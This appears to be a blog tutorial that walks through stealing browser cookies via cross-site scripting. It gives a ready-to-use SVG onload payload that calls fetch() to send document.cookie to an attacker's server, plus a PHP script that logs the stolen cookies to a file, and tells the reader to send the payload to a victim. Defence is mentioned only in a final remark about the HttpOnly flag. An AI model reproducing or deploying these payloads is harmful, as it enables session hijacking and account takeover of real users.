Hacking Tutorials XSS

Cookie Stealing With XSS (Optimized Payload)

How’s you doing bros? Today I am gonna show you how to steal cookies with my love, XSS. Lets go!

So basically injecting JavaScript in websites is called XSS and hence you XSS can do whatever the fuck JavaScript can.

We will use these six things:

  1. JavaScript
  2. Fetch API
  3. Our Server
  4. document.cookie property
  5. A Vulnerable Website
  6. A Sex Doll (Optional)

Fetch API is used to fetch resources such as webpages and document.cookie property returns the cookie from the DOM.

Step 1. Copy the following code thingy

<svg onload=fetch("//attacker:port/"%2Bcookie)>

Step 2. Most important step

Replace //attacker:port/ with your server name and port.

Step 3. Hack ’em!

Yeah, send it to your victim and check your server logs.

What the actual fuck?

  • We are injecting a HTML element into the webpage i.e. SVG.
  • onload is an event handler which gets triggered when element associated with it gets loaded.
  • fetch() is used to make request to a webpage
  • attacker:port is our server and port so it makes a request to us
  • %2B is the URL encoded form of +
  • cookie is as same as document.cookie which returns the cookie.

Putting it together: We are injecting a payload which makes request to our server including the cookie when loaded.

So…Thats it?

No! Who the fuck has time to check server logs and shit? Lets try plan B.

Step 1. Create Recording Mechanism

Open your text editor and paste the following code

 $url = $_SERVER['REQUEST_URI'];
 $new = str_replace('/r.php?=', '', $url);
 $handle = fopen('log.txt', 'w') or die('Cannot open file: '.'log.txt');
 fwrite($handle, $new);

and save it as r.php

Now create a blank text file with name log.txt and enter chmod +x log.txt in your terminal after navigating to it.

Step 2. That’s it

Host this file on your server and use the following payload:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

Just send the payload to your victim and the cookie will be stored in log.txt.

Note: No need to include the port because you will be serving it on default HTTP port i.e. 80.

Thanks for reading. I hope you enjoyed this tutorial.
Please check other tutorials as well.

Oh yeah one more thing…this method doesn’t work in case when a smart ass developer uses the HTTP-Only flag in their cookie header. So in that case the cookie never reaches the DOM and JavaScript can’t access it.

Also Read: SQL Injection Basics For Beginners

About the author


I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

1 Comment

Click here to post a comment

Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.